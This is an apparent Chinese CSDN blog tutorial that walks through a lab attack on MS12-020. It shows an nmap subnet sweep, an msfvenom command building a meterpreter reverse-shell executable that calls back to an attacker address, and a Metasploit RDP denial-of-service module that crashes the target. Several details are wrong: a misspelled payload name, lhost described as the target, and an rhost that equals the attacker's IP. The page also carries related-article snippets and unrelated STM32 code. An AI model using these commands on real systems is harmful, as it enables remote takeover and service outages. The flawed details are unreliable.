远程控制——ms12-020漏洞利用

最新推荐文章于 2024-05-09 19:54:59 发布
最新推荐文章于 2024-05-09 19:54:59 发布
阅读量5.6k 收藏 10
点赞数 4
文章标签: 信息安全 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Coffilater/article/details/121500961
版权

简单介绍Metaspoit

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Metasploit还提供了一系列可直接运行的功能程序,支持渗透测试者与安全研究人员快速地利用Metasploit框架内部能力完成一些特定任务。比如msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、JavaScript语言等多种形式,并可以进行各种类型的编码。

Metasploit的启动

打开终端,在里面输入 msfconsole

每次打开的图案可能都不同,这次是爱心,下次可能是个鸭。这个没什么其他含义,不用管。

图中还给出当前的Metaspoit的版本为v6.1.4 。其中包含了2162个expoits、1147个auxiliary、367个post、592个payloads、45个encoders、10个nops。

更多的Metaspoit的相关知识在这里就不再追溯了,Metaspoit的基本命令参考相关链接

Metasploit常用命令

应用——远程攻击

一、两个虚拟机的网络连接方式都是桥接。

3389端口是Windows2000(2003) Server远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,因此远程服务器一般都将这个端口修改数值或者关闭。所以,3389端口一般是关闭的,要进行远程控制,靶机要开启3389端口,我们先手动打开靶机的3389端口。如图。

其他开启3389端口的方法,可参考以下链接

如何在自己的电脑上开启3389端口?

二、nmap扫描出开启3389的主机

1、扫描一下同一网段下的主机  nmap -sP 192.168.43.79/24

 发现了我的靶机。

2、对它扫描一下,发现它的3389已经开启。(平时是关闭的,但是前面已经手动打开了)

三、msfmsfvenom

msfvenom更多的使用可参考以下链接(别人的笔记)

metasploit 之 msfvenom的使用

1、制作木马,在终端输入 msfvenom -p windows/meterpreter/revers_tcp lhost=192.168.43.56 lport=5000 -f exe -o /root/payload.exe

注:

-p 选择一个payload

-f 生成的文件格式

-o(或者 > ) 输出路径

lhost=目标主机 lport=目标端口

 

2、启动Metasploit。打开终端,在里面输入 msfconsole

 

3、查找ms12-020漏洞 search ms12-020

ms12-020漏洞:远程桌面中的漏洞可能允许远程执行代码

4、使用use进入模块 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

 

5、查看模块需要配置的参数:show options

6、 设置参数: set  rhost=192.168.43.56 (目标主机)

 7、攻击:run

 攻击后靶机蓝屏然后重启了。

Coffilater
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
ms12-020压缩包
04-03
3月19日消息,Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020,微软公司把该漏洞级别定为最高级-严重(Critical),攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限
永恒之蓝漏洞修复工具
06-30
"永恒之蓝"是2017年全球范围内爆发的一次大规模网络安全事件,其主要利用了微软Windows系统中的一个严重漏洞——MS17-010。这个漏洞是由名为"影子经纪人"的黑客组织泄露的NSA(美国国家安全局)网络武器库中的攻击...
CVE2012-0002(ms12-020)蓝屏漏洞利用
最新发布
2302_81096429的博客
05-09 665
ms12-020(漏洞全称:Microsoft Windows 远程桌面协议远程代码执行漏洞) 漏洞是一个远程代码执行漏洞。输入use 0使用漏洞扫描模块,进入后使用show options查看可使用选项设置rhosts为靶机ip。0 auxiliary/scanner/rdp/ms12_020_check是漏洞扫描模块。back返回用use 1使用攻击载荷模块,剩下操作与漏洞扫描模块一样,run执行。设置rhosts为靶机ip,设置完成后run执行,执行后显示漏洞可利用。3.搜索ms12-020漏洞。
远程控制——ms12-020漏洞利用(蓝屏攻击)
wwwwyyyrre的博客
04-22 1136
(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020
ms12-020漏洞复现
yyds132310的博客
05-07 1533
windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.239.135 #指定靶机地址。auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块。auxiliary/scanner/rdp/ms12_020_check是扫描模块。#扫描系统的3389端口是否是开放的。
内网渗透测试:初探远程桌面安全问题
A_991128a的博客
07-30 471
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。文中若有不当之处还请各位大佬多多点评。
第7篇:MS12-020蓝屏漏洞在实战中的巧用
ABC_123的博客
04-30 2639
Part1 前言大家好,上期分享了一篇Shiro Oracle Padding反序列化漏洞无key的实战文章,这期讲一个MS12-020蓝屏漏洞的真实利用过程。这个案例源于2013年我在读研期间,印象是比较深的。在学校期间,我偶尔会帮网络部那边处理一些网站故障,还帮忙修补过安全漏洞。在那个年代,大学网站的漏洞是非常多的,基本上没有什么WAF设备防护。期间有一个大学网站.........
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
利用 Fastjson 注入 Spring 内存马,太秀了~!(csdn)————程序.pdf
12-04
例如,利用 JNDI (Java Naming and Directory Interface) 来加载远程资源,攻击者可以指定恶意的 dataSourceName,使得应用在反序列化过程中连接到攻击者控制的 LDAP 服务器,下载并执行恶意代码。 以下是一个简单...
工控安全职业证书技能实践:工控已知漏洞验证与实战.pptx
07-12
攻击机则使用Kali Linux,通过Exploit-DB上的exploit模块,针对InduSoft Web Studio的特定远程代码执行(RCE)漏洞进行测试。 验证过程中,我们需要在攻击机上准备环境,导入并加载漏洞利用模块,然后配置目标信息...
KODExplorer 芒果云-资源管理器
07-16
- 修复漏洞:创建副本加入权限控制。和拖文件拽权限一致 - 文件上传失败检测 - 树目录同步优化 ###ver2.5 `2014/6/15` ---- ####update: - 增加创建副本功能 按住ctrl拖拽即可,可以到当前,也可以到文件夹。 ...
MS12-020漏洞利用-----蓝屏攻击(windows安全
lzj20060418的博客
05-06 1358
可以看到开启了3389端口,远程连接服务,那么便可以尝试蓝屏攻击,这是提前得知对方靶机为windows server 2008 R2的情况下。如果不知道,那么使用nmap工具进行扫描即可得知。Ms12-020可以危害的系统版本有:windows server 2008 R2, windows xp等。证明,该靶机存在ms12-020的漏洞,没有相关的补丁,则可以攻击。首先更换为攻击模块,重新配置靶机的ip。可以看到靶机已经蓝屏了,并开始在重启。进入msfconsole终端。
NMAP扫描: 在kali中使用NMAP扫描 NMAP半开扫描抓包分析:Win2008开放3389端口与关闭80端口
彭淦淦的博客
04-25 1934
3.2 步骤 实现此案例需要按照如下步骤进行。 1)开放的3389端口扫描,如图-7所示。 nmap -sS -p 3389 192.168.198.10 图-7 2)关闭的80端口扫描,如图-8所示。 nmap -sS -p 80 192.168.198.10 图-8 ...
10 个用于网络管理员进行高级扫描的端口扫描工具
allway2的博客
07-19 2万+
一秒钟扫描数千个端口!让我们看看网络管理员如何做到这一点。您如何知道网络上特定IP或IP范围的可用端口?好吧,如果您正在考虑手动检查,那将需要很多时间。最好使用工具更快地扫描端口。之前,我谈到了如何并收到反馈以涵盖用于扫描Intranet网络的工具。有多种端口扫描方法——TCP、FIN、ICMP、Idle、SYN、UDP、ACK、Windows等。并非每个扫描仪都具备这些方法,因此请选择适合您要求的方法。所以,给你。TCP端口扫描器顾名思义——它只能扫描TCP端口。命令-r。......
RDP远程涉及黑客入侵?桌面3389端口检查一下
11-07 1738
目前通过远程协议(RDP)3389端口入侵的恶意软件的报告有所增加,这是一个十分强大协议,至今已经有十几年的历史。通过RDP协议您可以从全球的一端连接到另一端的Windows桌免,不过也是有一些遗憾,尽管RDP协议可以用于多种目的,从远程可以手动配置您的服务器,但是如果使用不当它被黑客利用的时候,您的计算机就安全就受到了严重的威胁。 这怎么可能呢?如果您的计算机正在“侦听” RDP信号(通常通过...
kali-Linux局域网渗透之Win2003
LJHandCXY的博客
02-27 3783
相关参数 kali的IP地址为:192.168.0.103/24 win2003的IP地址为:192.168.0.138/24 1.蓝屏攻击   原理:利用操作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码   前提:对方开启3389端口且只对某些操作系统有效   操作: 1.扫描 nmap -sS -O [IP地址] 或 nmap -sT [IP地址] 大家看着来啊!(我是比较习惯用这两个) 如果大家扫描0
内网隧道搭建总结(一)
crowsec
02-11 5237
内网隧道搭建总结(一)
内网横向移动—Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 990
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
STM32F407——流水灯
09-19
对于在STM32F407上实现流水灯,你可以按照以下步骤进行操作: 1. 首先,需要配置GPIO引脚为输出模式,并设置相应的引脚电平。可以使用STM32CubeMX工具来生成初始化代码,或者手动编写代码进行配置。 2. 创建一个循环,在循环中依次将各个引脚置高电平,然后延时一段时间,再依次将引脚置低电平,再延时一段时间。 3. 重复上述步骤,就可以实现流水灯效果。 下面是一个简单的示例代码,演示了如何在STM32F407上实现流水灯效果: ```c #include "stm32f4xx.h" #include "stm32f4xx_hal.h" // 定义LED引脚 #define LED_PIN_1 GPIO_PIN_12 #define LED_PIN_2 GPIO_PIN_13 #define LED_PIN_3 GPIO_PIN_14 #define LED_PIN_4 GPIO_PIN_15 // 定义延时时间 #define DELAY_MS 500 int main(void) { // 初始化HAL库 HAL_Init(); // 初始化GPIO库 __HAL_RCC_GPIOA_CLK_ENABLE(); GPIO_InitTypeDef GPIO_InitStruct; GPIO_InitStruct.Pin = LED_PIN_1 | LED_PIN_2 | LED_PIN_3 | LED_PIN_4; GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP; GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW; HAL_GPIO_Init(GPIOA, &GPIO_InitStruct); // 循环流水灯 while (1) { // 依次点亮LED HAL_GPIO_WritePin(GPIOA, LED_PIN_1, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_2, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_3, GPIO_PIN_SET); HAL_Delay(DELAY_MS); HAL_GPIO_WritePin(GPIOA, LED_PIN_4, GPIO_PIN_SET); HAL_Delay(DELAY_MS); // 依次熄灭LED HAL_GPIO_WritePin(GPIOA, LED_PIN_1 | LED_PIN_2 | LED_PIN_3 | LED_PIN_4, GPIO_PIN_RESET); HAL_Delay(DELAY_MS); } } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值